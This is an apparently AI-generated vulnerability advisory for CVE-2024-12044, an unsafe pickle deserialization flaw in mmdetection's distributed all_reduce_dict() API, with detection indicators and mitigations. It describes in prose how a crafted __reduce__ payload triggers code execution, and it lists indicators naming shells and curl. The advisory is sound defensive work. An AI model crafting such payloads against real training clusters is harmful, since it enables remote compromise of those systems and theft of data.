CVE-2024-12044 Overview
CVE-2024-12044 is a remote code execution vulnerability in open-mmlab/mmdetection version v3.3.0, an open-source object detection toolbox built on PyTorch. The flaw exists in the all_reduce_dict() distributed training API, which calls pickle.loads() on untrusted data without sanitization. An attacker on the distributed training network can broadcast a malicious serialized payload to trigger arbitrary code execution on participating nodes. The vulnerability is classified under CWE-502: Deserialization of Untrusted Data.
Critical Impact
Attackers can execute arbitrary code on distributed training workers by broadcasting a crafted pickle payload, compromising confidentiality, integrity, and availability of GPU training clusters.
Affected Products
- open-mmlab/mmdetection version v3.3.0
- Distributed training deployments using the all_reduce_dict() API
- PyTorch-based training clusters that integrate the affected module
Discovery Timeline
- 2025-03-20 - CVE-2024-12044 published to the National Vulnerability Database (NVD)
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2024-12044
Vulnerability Analysis
The vulnerability resides in the all_reduce_dict() function within the distributed training utilities of mmdetection. This API is used to synchronize dictionary objects across worker nodes during multi-GPU or multi-node training. To exchange complex Python objects across processes, the function serializes payloads with pickle and reconstructs them on receiving nodes using pickle.loads().
Python's pickle module executes arbitrary callables defined within the byte stream during deserialization. When pickle.loads() operates on attacker-controlled bytes, it can invoke __reduce__ methods that spawn subprocesses, write files, or import arbitrary modules. The mmdetection implementation performs no integrity verification, authentication, or type filtering before deserialization.
Deserialization runs in the context of the training process, which typically holds privileged access to GPU resources, model weights, training datasets, and credentials for cloud storage or experiment tracking platforms. The high EPSS percentile reflects the well-understood exploitability of pickle deserialization issues.
Root Cause
The root cause is the unconditional invocation of pickle.loads() on data received from peer processes in a distributed collective operation. The code treats inter-node communication as trusted, but a malicious or compromised peer, a network attacker positioned between nodes, or a poisoned training input pipeline can supply a crafted byte stream.
Attack Vector
An attacker who can inject data into the distributed training collective broadcasts a pickle payload whose __reduce__ returns a tuple invoking os.system, subprocess.Popen, or eval. When all_reduce_dict() deserializes the payload on each rank, the embedded callable executes immediately under the training user's identity. Exploitation requires no authentication when inter-node traffic is unprotected and no user interaction.
The vulnerability mechanism is described in the Huntr Bounty Report. No public proof-of-concept code is referenced in the enriched data.
Detection Methods for CVE-2024-12044
Indicators of Compromise
- Unexpected child processes such as sh, bash, python -c, or curl spawned by the mmdetection training process during all_reduce collective operations
- Outbound network connections initiated by training workers to non-allowlisted hosts shortly after distributed synchronization phases
- Unusual file writes under home directories, /tmp, or model checkpoint paths originating from the training process
- Modifications to Python site-packages or training scripts on worker nodes without an authorized deployment event
Detection Strategies
- Hunt for pickle.loads invocations on tensors or buffers received over torch.distributed primitives within mmdetection code paths
- Alert on training processes executing shell interpreters or network clients, which are not part of normal training behavior
- Inspect distributed training logs for deserialization exceptions or rank-specific crashes that may indicate failed exploitation attempts
Monitoring Recommendations
- Enable process lineage and command-line telemetry on all GPU training hosts and forward to a central analytics platform
- Monitor egress traffic from training clusters against an allowlist of model registries, dataset stores, and experiment trackers
- Capture file integrity events for the mmdetection installation directory and shared dataset volumes
How to Mitigate CVE-2024-12044
Immediate Actions Required
- Restrict distributed training traffic to isolated network segments with mutual authentication between ranks, for example using TLS-protected NCCL or encrypted overlays
- Run training workloads as unprivileged users in containers with read-only code mounts and no outbound internet access unless required
- Audit any custom forks or downstream projects that import all_reduce_dict() and replace pickle with a safe serializer such as safetensors, msgpack, or JSON for dictionary synchronization
Patch Information
The enriched data does not reference a fixed version. Operators should consult the upstream open-mmlab/mmdetection repository and the Huntr Bounty Report for remediation status and apply the latest release once available. Until a patch is published, avoid running v3.3.0 in environments where peer nodes or network paths cannot be fully trusted.
Workarounds
- Disable or avoid the all_reduce_dict() API and replace it with collective operations that exchange tensors only, never pickled Python objects
- Place training nodes inside a dedicated VPC or VLAN with strict ingress and egress rules to prevent untrusted peers from joining the collective
- Apply pod security policies or seccomp profiles that block execve of shell binaries from the training process
# Example: restrict torch.distributed traffic to an isolated subnet
export MASTER_ADDR=10.42.0.1
export MASTER_PORT=29500
export NCCL_SOCKET_IFNAME=eth1 # private training NIC only
export GLOO_SOCKET_IFNAME=eth1
# Block all egress except dataset and registry endpoints
iptables -A OUTPUT -o eth1 -d 10.42.0.0/24 -j ACCEPT
iptables -A OUTPUT -o eth0 -j REJECT
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


